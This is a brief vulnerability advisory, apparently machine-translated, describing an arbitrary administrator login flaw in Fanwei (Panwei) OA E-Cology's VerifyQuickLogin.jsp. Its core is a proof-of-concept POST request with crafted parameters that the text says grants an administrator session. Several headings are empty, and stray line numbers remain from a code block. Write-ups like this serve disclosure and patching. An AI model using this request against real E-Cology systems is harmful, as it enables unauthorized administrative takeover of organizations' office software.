Fanwei Oa E Cology Verifyquicklogin Jsp Any Administrator Login Vulnerability
Fanwei Oa E Cology Verifyquicklogin Jsp Any Administrator Login Vulnerability
Panwei OA E-Cology VerifyQuickLogin.jsp Any administrator login vulnerability
Vulnerability Description
There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file, which attacks the administrator session by sending a special request package.
Vulnerability Impact
Panwei OA E-Cology
Network surveying and mapping
Vulnerability reappears
Product Home Page
Verify POC
1
2
3
POST /mobile/plugin/VerifyQuickLogin.jsp
identifier=1&language=1&ipaddress=x.x.x.x
This post is licensed under CC BY 4.0 by the author.